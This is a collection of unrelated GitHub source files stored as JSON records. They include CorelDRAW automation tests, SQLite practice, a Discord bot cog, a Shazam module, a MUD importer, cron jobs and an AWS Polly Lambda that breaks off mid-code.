cdrObj.replacePart(['C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\2.cdr','mytest'],cdrObj.app.ActiveShape)\n\n\n# Save the file\ndef testSaveCDR():\n    cdrObj = CDR()\n\n    # for thecolor in paletteObj.Colors():\n    #     print(thecolor)\n    standardColor = {\n        \"69_2_20_0\":\"深色背景\",\n        \"1_0_0_0\":\"暮光之城色\",\n        \"93_88_89_80\":\"仓色\",\n        \"0_0_0_0\":\"白色\",\n        \"100_88_47_61\":\"Stratos\"\n        # \"6_4_4_0\":\"瓷色\"\n    }\n\n    errorObj = cdrObj.standardizedColor(standardColor)\n    print(errorObj)\n    # cdrObj.modifyShapeColor(errorObj.shapeObj)\n\n\n    # for index in range(cdrObj.app.Palettes.Item(2).ColorCount):\n    #     cdrObj.app.Palettes.Item(2).Color(index+1).SetName(index)\n\n\n    # print(cdrObj.app.PaletteManager.DefaultPalette.GetPalette(\"调色板\"))\n\n    # Export the specified page\n    # cdrObj.exportBitmap(1,1136,700,'C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\test.jpg')\n    \n    # cdrObj.exportAllBitmap(1136,700,'C:\\\\Users\\\\Administrator\\\\Desktop\\\\111')\n    # Export all pages\n    # Only the target directory is needed\n    # cdrObj.exportAllBitmap(1136,700,'C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\')\n    # cdrObj.saveCDR('C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\51.cdr')\n\ndef testExportImage():\n    cdrObj = CDR()\n    cdrObj.exportBitmap('C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\test\\\\test.png',6)\n    pass\n\n\ndef testCopy():\n    cdrObj = CDR(\"D:\\\\github\\\\cdr\\\\mmxai\\\\src\\\\templates\\\\brochures\\\\画册-医疗-竖-001.cdr\")\n    cdrObj1 = CDR(\"D:\\\\github\\\\cdr\\\\mmxai\\\\src\\\\templates\\\\brochures\\\\Backup_of_画册-医疗-竖-001.cdr\")\n    cdrObj.acrossCopyToLayer(cdrObj1,6)\n\ndef getTextWidth(text,pointSize):\n    font = TTFont('C:\\simsun.ttf')\n    cmap = font['cmap']\n    t = cmap.getcmap(3,1).cmap\n    s = font.getGlyphSet()\n    units_per_em = font['head'].unitsPerEm\n\n    total = 0\n    for c in text:\n        if ord(c) in t and t[ord(c)] in s:\n            total += s[t[ord(c)]].width\n        else:\n            total += s['.notdef'].width\n    total = total*float(pointSize)/units_per_em\n    return total\n\ndef testFont():\n    # font = TTFont('simsun.ttf')\n    cdrObj = CDR()\n    for k in cdrObj.app.FontList:\n        print(k)\n    # print(cdrObj.doc.ActiveShape.Text.Story.font)\n    # cdrObj.doc.ActiveShape.Text.Story.charspacing = 0\n    # a = cdrObj.doc.ActiveShape.SizeWidth\n    # print(a)\n    # cdrObj.doc.ActiveShape.Text.Story.charspacing = 100\n    # b = cdrObj.doc.ActiveShape.SizeWidth\n    # print(b)\n    # print((b-a)/10)\n    # width = getTextWidth('的',10)\n    # print(width)\n\nif __name__ == '__main__':\n    # testSaveCDR()\n    # testSaveCDR()\n    # importText()\n    # paletteTest1()\n    # paletteTest2()\n    # testSaveCDR()\n    testFont()\n\n    \n    \n\n", "repo_name": "JsAaron/cdr", "sub_path": "src/call.py", "file_name": "call.py", "file_ext": "py", "file_size_in_byte": 10088, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cdr.CDR", "line_number": 8, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 14, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 20, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 25, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 31, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 32, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 33, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 34, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 39, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 53, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 73, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 90, 
"usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 109, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 127, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 139, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 146, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 153, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 164, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 175, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 183, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 203, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 211, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 245, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 251, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 252, "usage_type": "call"}, {"api_name": "fontTools.ttLib.TTFont", "line_number": 256, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 273, "usage_type": "call"}]} +{"seq_id": "34064259824", "text": "import sqlite3\n\n# sqlite3.Connection 연결 객체 생성\nconn = sqlite3.connect('db.sqlite3')\n\ncur = conn.cursor()\n\ncur.execute(\n '''\n DROP TABLE IF EXISTS user\n '''\n)\ncur.execute(\n '''\n CREATE TABLE user (\n pk_user_id INTEGER,\n name TEXT,\n PRIMARY KEY (pk_user_id)\n )\n '''\n)\n\n# 데이터베이스의 CRUD\n# Create / Read / Update / Delete\n\n# CREATE 데이터 생성\ncur.execute(\n '''\n INSERT INTO user\n VALUES (1, 'seop')\n '''\n)\n\ncur.execute(\n '''\n INSERT INTO user\n VALUES (?, ?) \n ''',\n (2, '철수')\n)\n\nuser_list = [\n (4, '연수'),\n (3, '영희'),\n]\n\ncur.executemany(\n '''\n INSERT INTO user\n VALUES (?, ?)\n ''',\n user_list\n)\n\n# READ (조회)\ncur.execute(\n '''\n SELECT * FROM user\n '''\n)\n\n# row = cur.fetchone()\n# print(row)\n\n# rows = cur.fetchmany(size=2)\n# print(rows)\n\nrows = cur.fetchall()\nprint(rows)\n\n# UPDATE\ncur.execute(\n '''\n UPDATE user\n SET name='현영'\n WHERE pk_user_id = 4\n '''\n # WHERE pk_user_id >= 2 이런 식으로 범위 지정 가능\n)\n\n# DELETE\ncur.execute(\n '''\n DELETE FROM user\n WHERE pk_user_id = 4\n '''\n)\n\n'''\nUPDATE 테이블명\nSET 컬럼명 = 값\n[WHERE ]\n\nDELETE FROM 테이블명\n[WHERE 조건]\n'''\n\nconn.commit()\n", "repo_name": "sangseophwang/Pythonworkspace", "sub_path": "02. 
sql_practice/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "71194917953", "text": "import discord\nfrom discord.ext import commands\nfrom datetime import datetime\n\nfrom discord.ext.commands.errors import NoEntryPointError\n\nclass voicechannel(commands.Cog):\n def __init__(self, client):\n self.client = client\n \n @commands.Cog.listener()\n async def on_ready(self):\n print('voicechannel is ready')\n\n @commands.command()\n async def testcog_voicechannel(self, ctx):\n await ctx.send(\"Cog is ready\")\n\n @commands.command()\n async def set_parent_channel(self, ctx, id: int = 0):\n global parentid\n if(id ==0):\n await ctx.send(\"Az id nem lehet 0\")\n return\n with open(\"voicechannel/parentchannelids.txt\", 'a') as fp:\n fp.write(f\"{id}\\n\")\n\n @commands.command()\n async def get_parent_channels(self,ctx):\n\n with open(\"voicechannel/parentchannelids.txt\", \"r\") as fp:\n lines = fp.readlines()\n\n embed = discord.Embed(\n title = \"Parental voicechannels\",\n colour = discord.Colour.blue(),\n timestamp = datetime.utcnow()\n )\n embed.set_thumbnail(url= self.client.user.avatar_url)\n for x in lines:\n if(x==None):\n return\n ch = self.client.get_channel(int(x))\n embed.add_field(name=ch.name, value=f\"Guild: {ch.guild}\\n Category: {ch.category}\\n Position: {ch.position}\")\n\n await ctx.send(embed = embed)\n\n @commands.command()\n async def remove_parent_channel(self, ctx, id: int):\n with open(\"voicechannel/parentchannelids.txt\", \"r\") as fp:\n lines = fp.readlines()\n with open(\"voicechannel/parentchannelids.txt\", \"w\") as fp:\n for line in lines:\n if line.strip(\"\\n\") != f\"{id}\":\n fp.write(line)\n\n @commands.Cog.listener()\n async def on_voice_state_update(self, member, before, after):\n\n if(member.bot == True):\n return\n \n with open(\"voicechannel/parentchannelids.txt\", 'r') as fp:\n parentids = fp.read()\n\n #ha belép a szobát szeretnékbe\n if(after.channel !=None and str(after.channel.id) in parentids):\n print(\"joined to parent channel\")\n\n channelname = member.nick\n if member.nick == None:\n channelname = member.name\n channel = await member.guild.create_voice_channel(f\"{channelname} által kért voice\")\n await channel.edit(position=after.channel.position+1, category=after.channel.category, sync_permissions=True)\n await channel.set_permissions(member, manage_channels=True)\n await member.move_to(channel)\n\n with open(\"voicechannel/channelids.txt\", 'a') as fp:\n fp.write(f\"{channel.id}\\n\")\n\n # ha lelép a kapott szobából\n if(before.channel != None and after.channel == None):\n with open(\"voicechannel/channelids.txt\", 'r') as fp:\n content = fp.read()\n if(len(before.channel.members)==0 and str(before.channel.id) in content):\n await before.channel.delete()\n\n with open(\"voicechannel/channelids.txt\", \"r\") as fp:\n lines = fp.readlines()\n with open(\"voicechannel/channelids.txt\", \"w\") as fp:\n for line in lines:\n if line.strip(\"\\n\") != f\"{before.channel.id}\":\n fp.write(line)\n\n #ha ellép a kapott szobából\n if(before.channel != None and after.channel != None):\n with open(\"voicechannel/channelids.txt\", 'r') as fp:\n content = fp.read()\n if(len(before.channel.members)==0 and str(before.channel.id) in content):\n await before.channel.delete()\n\n with open(\"voicechannel/channelids.txt\", 
\"r\") as fp:\n lines = fp.readlines()\n with open(\"voicechannel/channelids.txt\", \"w\") as fp:\n for line in lines:\n if line.strip(\"\\n\") != f\"{before.channel.id}\":\n fp.write(line)\n\n\ndef setup(client):\n client.add_cog(voicechannel(client))\n\n", "repo_name": "Bende126/vikbot", "sub_path": "cogs/voicechannel.py", "file_name": "voicechannel.py", "file_ext": "py", "file_size_in_byte": 4186, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 7, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 7, "usage_type": "name"}, {"api_name": "discord.ext.commands.Cog.listener", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 11, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 11, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 15, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 15, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 19, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 19, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 34, "usage_type": "call"}, {"api_name": "discord.Colour.blue", "line_number": 36, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 36, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 28, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 28, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 48, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 48, "usage_type": "name"}, {"api_name": "discord.ext.commands.Cog.listener", "line_number": 57, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 57, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "36531102680", "text": "\"\"\"py_township URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\n\nfrom app_root.helpers.views import HexToBinaryView, Base64EncodeDecodeView, GzipCompressUncompressView, \\\n FlowView_fetch_data, FlowView_fetch_city\n\napp_name = 'helpers'\n\nurlpatterns = [\n path('hex2bin/', HexToBinaryView.as_view(), name='hex2bin'),\n path('base64/', Base64EncodeDecodeView.as_view(), name='base64'),\n path('gzip/', GzipCompressUncompressView.as_view(), name='gzip'),\n path('flow/fetch_data/', FlowView_fetch_data.as_view(), name='flow_fetch_data'),\n path('flow/fetch_city/', FlowView_fetch_city.as_view(), name='flow_fetch_city'),\n]\n", "repo_name": "Gaolious/analysis-township", "sub_path": "py_township/township/app_root/helpers/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1274, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "app_root.helpers.views.HexToBinaryView.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "app_root.helpers.views.HexToBinaryView", "line_number": 25, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "app_root.helpers.views.Base64EncodeDecodeView.as_view", "line_number": 26, "usage_type": "call"}, {"api_name": "app_root.helpers.views.Base64EncodeDecodeView", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "app_root.helpers.views.GzipCompressUncompressView.as_view", "line_number": 27, "usage_type": "call"}, {"api_name": "app_root.helpers.views.GzipCompressUncompressView", "line_number": 27, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "app_root.helpers.views.FlowView_fetch_data.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "app_root.helpers.views.FlowView_fetch_data", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "app_root.helpers.views.FlowView_fetch_city.as_view", "line_number": 29, "usage_type": "call"}, {"api_name": "app_root.helpers.views.FlowView_fetch_city", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "2149155639", "text": "from firedrake import *\nimport pytest\nimport ufl\n\n\ndef test_extruded_interval_area():\n m = UnitIntervalMesh(10)\n\n DG = VectorFunctionSpace(m, 'DG', 1)\n new_coords = project(m.coordinates, DG)\n m._coordinate_fs = new_coords.function_space()\n m.coordinates = new_coords\n\n ufl.dx._subdomain_data = m.coordinates\n V = FunctionSpace(m, 'CG', 1)\n u = Function(V)\n u.assign(1)\n\n assert abs(assemble(u*dx) - 1.0) < 1e-12\n\n e = ExtrudedMesh(m, layers=4, layer_height=0.25)\n\n V = FunctionSpace(e, 'CG', 1)\n u = Function(V)\n u.assign(1)\n\n assert abs(assemble(u*dx) - 1.0) < 1e-12\n\n\ndef test_extruded_periodic_interval_area():\n m = PeriodicUnitIntervalMesh(10)\n\n V = FunctionSpace(m, 'CG', 1)\n u = Function(V)\n u.assign(1)\n assert abs(assemble(u*dx) - 1.0) < 1e-12\n\n e = ExtrudedMesh(m, layers=4, layer_height=0.25)\n V = FunctionSpace(e, 'CG', 1)\n u = Function(V)\n u.assign(1)\n\n assert abs(assemble(u*dx) - 1.0) < 1e-12\n\n\nif __name__ == '__main__':\n import os\n pytest.main(os.path.abspath(__file__))\n", "repo_name": "gmarkall/firedrake", 
"sub_path": "tests/extrusion/test_extrusion_0_dg_coords.py", "file_name": "test_extrusion_0_dg_coords.py", "file_ext": "py", "file_size_in_byte": 1069, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "ufl.dx", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pytest.main", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}]} +{"seq_id": "32223635271", "text": "from typing import List\n\nclass Solution:\n def minimumTotal(self, triangle: List[List[int]]) -> int:\n def miniIndex(triangle, index):\n num_layers = len(triangle)\n \n if len(triangle) == 0:\n return 0\n elif len(triangle) == 1:\n return triangle[0][0]\n elif index == 0:\n return miniIndex(triangle[:num_layers-1], index) + triangle[-1][index]\n elif index == len(triangle[-1]) -1:\n return triangle[-1][index] + miniIndex(triangle[:num_layers-1], index-1) \n else: \n return triangle[-1][index] + min(miniIndex(triangle[:num_layers-1], index), miniIndex(triangle[:num_layers - 1], index -1))\n\n if len(triangle) == 0:\n return 0\n else:\n res = []\n for index in range(len(triangle[-1])):\n res.append(miniIndex(triangle, index))\n return min(res)\n\nclass Solution1:\n def minimumTotal(self, triangle: List[List[int]]) -> int:\n if len(triangle) == 0:\n return 0\n \n res = []\n for i in range(len(triangle)):\n res.append([])\n for index, j in enumerate(triangle[i]):\n if i == 0:\n res[i].append(triangle[0][0])\n elif index == 0:\n res[i].append(res[i-1][0] + triangle[i][0])\n elif index == len(triangle[i]) - 1:\n res[i].append(res[i-1][-1] + triangle[i][-1])\n else:\n res[i].append(min(res[i-1][index], res[i-1][index - 1]) + triangle[i][index] )\n return min(res[-1])\n\n\n\n\nsol = Solution1()\ntra = [[2],[3,4],[6,5,7],[4,1,8,3]]\nres = sol.minimumTotal(tra)\nprint(res)\n \n \n \ntra = [[-10]]\nres = sol.minimumTotal(tra)\nprint(res)\n\n", "repo_name": "chrisbyd/leetcode_chris", "sub_path": "array/120.py", "file_name": "120.py", "file_ext": "py", "file_size_in_byte": 1881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "23993187529", "text": "import io\n\nfrom ShazamAPI import Shazam\n\nfrom .. 
import loader, utils\n\n\n@loader.tds\nclass ShazamMod(loader.Module):\n \"\"\"Shazam API\"\"\"\n\n strings = {\"name\": \"Shazam API\"}\n tag = \"[Shazam] \"\n\n @loader.owner\n async def shazamcmd(self, m):\n \"\"\"(reply to an audio message) - recognize the track\"\"\"\n s = await get_audio_shazam(m)\n if not s:\n return\n try:\n shazam = Shazam(s.track.read())\n recog = shazam.recognizeSong()\n track = next(recog)[1][\"track\"]\n await m.client.send_file(\n m.to_id,\n file=track[\"images\"][\"background\"],\n caption=self.tag + \"Recognized track: \" + track[\"share\"][\"subject\"],\n reply_to=s.reply.id,\n )\n await m.delete()\n except:\n await m.edit(f\"{self.tag}Could not recognize the track...\")\n\n async def shazamtextcmd(self, m):\n \"\"\"(reply to an audio message) - get the track lyrics\"\"\"\n s = await get_audio_shazam(m)\n if not s:\n return\n try:\n shazam = Shazam(s.track.read())\n recog = shazam.recognizeSong()\n track = next(recog)[1][\"track\"]\n text = track[\"sections\"][1][\"text\"]\n await utils.answer(\n m,\n \"\\n\".join(\n self.tag + f\"Lyrics of {track['share']['subject']}\\n\\n\" + text\n ),\n )\n except:\n await m.edit(f\"{self.tag}Could not recognize the track... | No lyrics available...\")\n\n\nasync def get_audio_shazam(m):\n class rct:\n track = io.BytesIO()\n reply = None\n\n reply = await m.get_reply_message()\n if reply and reply.file and reply.file.mime_type.split(\"/\")[0] == \"audio\":\n ae = rct()\n await utils.answer(m, \"[Shazam] Downloading...\")\n ae.track = io.BytesIO(await reply.download_media(bytes))\n ae.reply = reply\n await m.edit(\"[Shazam] Recognizing...\")\n return ae\n else:\n await utils.answer(m, \"[Shazam] reply to an audio message...\")\n return None", "repo_name": "drenix-drenix/modules", "sub_path": "Shazam API.py", "file_name": "Shazam API.py", "file_ext": "py", "file_size_in_byte": 2253, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ShazamAPI.Shazam", "line_number": 22, "usage_type": "call"}, {"api_name": "ShazamAPI.Shazam", "line_number": 41, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 57, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 64, "usage_type": "call"}]}
{"seq_id": "30199176303", "text": "from shinymud.lib.sport_plugins import SportError\nfrom shinymud.models.player import Player\nfrom shinymud.models.item import GameItem\nfrom shinymud.models.item_types import ITEM_TYPES\n\nimport traceback\nimport json\nimport re\n\ndef format(world, raw_data):\n \"\"\"Deserialize a player character saved in ShinyFormat and add it to \n the world.\n \n raw_data - the data to be deserialized into a player object.\n world - The World instance\n \"\"\"\n pc = json.loads(_match_shiny_tag('Player', raw_data))\n items = json.loads(_match_shiny_tag('Inv Items', raw_data))\n # Build the area from the assembled dictionary data\n try:\n new_pc = Player(('foo', 'bar'))\n new_pc.playerize(pc)\n new_pc.save()\n # Inventory time!\n containers = {} # old_container_dbid : [new_containee1, ...]\n old_new = {} # old dbid's mapped to their new ones\n \n for item in items:\n my_container = item[0].get('container')\n old_dbid = item[0]['dbid']\n del item[0]['dbid']\n if item[0].get('owner'):\n item[0]['owner'] = new_pc.dbid\n else:\n del item[0]['container']\n i = GameItem(item[0])\n i.save()\n load_item_types(i, item[1])\n old_new[old_dbid] = i.dbid\n if my_container:\n if containers.get(my_container):\n containers[my_container].append(i)\n else:\n containers[my_container] = [i]\n \n for 
old_container_dbid, containees_list in containers.items():\n for containee in containees_list:\n containee.container = old_new.get(old_container_dbid)\n containee.save()\n \n except Exception as e:\n # if anything went wrong, make sure we destroy any leftover character\n # data. This way, we won't run into problems if they try to import it\n # again, and we won't leave orphaned or erroneous data in the db.\n world.log.error(traceback.format_exc())\n try:\n new_pc.destruct()\n except:\n # if something goes wrong destroying the pc, it probably means we\n # didn't get far enough to have anything to destroy. Just ignore any\n # errors.\n pass\n \n raise SportError('There was a horrible error on import! '\n 'Aborting! Check logfile for details.')\n \n return 'Character \"%s\" has been successfully imported.' % new_pc.fancy_name()\n\ndef load_item_types(item, item_types):\n for name,data in item_types.items():\n if name in ITEM_TYPES:\n data['game_item'] = item.dbid\n new_itype = ITEM_TYPES[name](data)\n new_itype.save()\n\ndef _match_shiny_tag(tag, text):\n \"\"\"Match a ShinyTag from ShinyFormat.\n tag -- the name of the tag you wish to match\n text -- the text to be searched for the tags\n Returns the string between the tag and its matching end-tag.\n Raises an exception if the tag is not found.\n \"\"\"\n exp = r'\\[' + tag + r'\\](\\n)?(?P<tag_body>.*?)(\\n)?\\[End ' + tag +\\\n r'\\](\\n)?'\n match = re.search(exp, text, re.I | re.S)\n if not match:\n raise SportError('Corrupted file: missing or malformed %s tag.' % tag)\n return match.group('tag_body')\n", "repo_name": "shinymud/ShinyMUD", "sub_path": "src/shinymud/lib/sport_plugins/formatters/player_read_shiny_format.py", "file_name": "player_read_shiny_format.py", "file_ext": "py", "file_size_in_byte": 3355, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 41, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.loads", "line_number": 17, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "shinymud.models.player.Player", "line_number": 21, "usage_type": "call"}, {"api_name": "shinymud.models.item.GameItem", "line_number": 36, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 55, "usage_type": "call"}, {"api_name": "shinymud.lib.sport_plugins.SportError", "line_number": 64, "usage_type": "call"}, {"api_name": "shinymud.models.item_types.ITEM_TYPES", "line_number": 71, "usage_type": "name"}, {"api_name": "shinymud.models.item_types.ITEM_TYPES", "line_number": 73, "usage_type": "name"}, {"api_name": "re.search", "line_number": 85, "usage_type": "call"}, {"api_name": "re.I", "line_number": 85, "usage_type": "attribute"}, {"api_name": "re.S", "line_number": 85, "usage_type": "attribute"}, {"api_name": "shinymud.lib.sport_plugins.SportError", "line_number": 87, "usage_type": "call"}]}
{"seq_id": "23913555582", "text": "from django.utils import timezone\nfrom django_cron import CronJobBase, Schedule\nfrom news.service.feed_services import all_feeds_link\nfrom news.service.profile_services import all_profile\nfrom news.utility.populate_utilities import update_feed\nfrom news.utility.recommend_utilities import recommend_based_content\n\n\nclass update_rss(CronJobBase):\n RUN_EVERY_MINS = 15\n RETRY_AFTER_FAILURE_MINS = 5\n\n schedule = Schedule(run_every_mins=RUN_EVERY_MINS,\n retry_after_failure_mins=RETRY_AFTER_FAILURE_MINS)\n code = 'cron.update_rss'\n\n @staticmethod\n def do():\n print(\"START CRON1 - Updating entries 
({})\".format(timezone.now()))\n for link in all_feeds_link():\n try:\n update_feed(link, printer=True)\n except Exception as excep:\n print(\"Error de cron: {}\".format(excep))\n\n print(\"FIN CRON1 - Actualizando entradas ({})\".format(timezone.now()))\n\n\nclass calculate_keywords(CronJobBase):\n RUN_EVERY_MINS = 30\n RETRY_AFTER_FAILURE_MINS = 5\n\n schedule = Schedule(run_every_mins=RUN_EVERY_MINS,\n retry_after_failure_mins=RETRY_AFTER_FAILURE_MINS)\n code = 'cron.calculate_keywords'\n\n @staticmethod\n def do():\n print(\"INI CRON2 - Calculando keywords por cada usuario ({})\".format(timezone.now()))\n\n print('\\tBasado en contenido')\n for profile in all_profile():\n print('\\t\\tINI {}'.format(profile))\n\n try:\n critics, keywords = recommend_based_content(profile)\n print('\\t\\t\\tKeywords: {}'.format(keywords))\n except Exception as excep:\n print(\"Error de cron: {}\".format(excep))\n\n print(\"FIN CRON2 - Calculando keywords por cada usuario ({})\".format(timezone.now()))", "repo_name": "ltnews/ltnews-backend", "sub_path": "ltnews/cron.py", "file_name": "cron.py", "file_ext": "py", "file_size_in_byte": 1811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django_cron.CronJobBase", "line_number": 9, "usage_type": "name"}, {"api_name": "django_cron.Schedule", "line_number": 13, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 19, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 19, "usage_type": "name"}, {"api_name": "news.service.feed_services.all_feeds_link", "line_number": 20, "usage_type": "call"}, {"api_name": "news.utility.populate_utilities.update_feed", "line_number": 22, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 26, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 26, "usage_type": "name"}, {"api_name": "django_cron.CronJobBase", "line_number": 29, "usage_type": "name"}, {"api_name": "django_cron.Schedule", "line_number": 33, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 39, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 39, "usage_type": "name"}, {"api_name": "news.service.profile_services.all_profile", "line_number": 42, "usage_type": "call"}, {"api_name": "news.utility.recommend_utilities.recommend_based_content", "line_number": 46, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 51, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "29698266021", "text": "import boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nimport os\nfrom contextlib import closing\nimport json\n\n\ndef convert_to_video(event, context):\n postId = event[\"Records\"][0][\"Sns\"][\"Message\"]\n\n # Retrieving information about the post from DynamoDB table\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table(os.environ['DYNAMODB_TABLE'])\n postItem = table.query(\n KeyConditionExpression=Key('id').eq(postId)\n )\n\n text = postItem[\"Items\"][0][\"text\"]\n voice = postItem[\"Items\"][0][\"voice\"]\n\n rest = text\n\n # Because single invocation of the polly synthesize_speech api can\n # transform text with about 1,500 characters, we are dividing the\n # post into blocks of approximately 1,000 characters.\n textBlocks = []\n while len(rest) > 1100:\n begin = 0\n end = rest.find(\".\", 1000)\n\n if end == -1:\n end = 
rest.find(\" \", 1000)\n\n textBlock = rest[begin:end]\n rest = rest[end:]\n textBlocks.append(textBlock)\n textBlocks.append(rest)\n\n # For each block, invoke Polly API, which will transform text into audio\n polly = boto3.client('polly')\n for textBlock in textBlocks:\n response = polly.synthesize_speech(\n OutputFormat='mp3',\n Text=textBlock,\n VoiceId=voice\n )\n\n # Save the audio stream returned by Amazon Polly on Lambda's temp\n # directory. If there are multiple text blocks, the audio stream\n # will be combined into a single file.\n if \"AudioStream\" in response:\n with closing(response[\"AudioStream\"]) as stream:\n output = os.path.join(\"/tmp/\", postId)\n with open(output, \"a\") as file:\n file.write(stream.read())\n\n s3 = boto3.client('s3')\n s3.upload_file('/tmp/' + postId,\n os.environ['BUCKET_NAME'],\n postId + \".mp3\")\n s3.put_object_acl(ACL='public-read',\n Bucket=os.environ['BUCKET_NAME'],\n Key=postId + \".mp3\")\n\n location = s3.get_bucket_location(Bucket=os.environ['BUCKET_NAME'])\n region = location['LocationConstraint']\n\n url = \"https://s3%(region)s.amazonaws.com/%(bucket_name)s/%(postId)s.mp3\" % {\n \"region\": \"-%s\" % str(region) if region else \"\",\n \"bucket_name\": os.environ['BUCKET_NAME'],\n \"postId\": str(postId)\n }\n\n # Updating the item in DynamoDB\n response = table.update_item(\n Key={'id': postId},\n UpdateExpression=\n \"SET #statusAtt = :statusValue, #urlAtt = 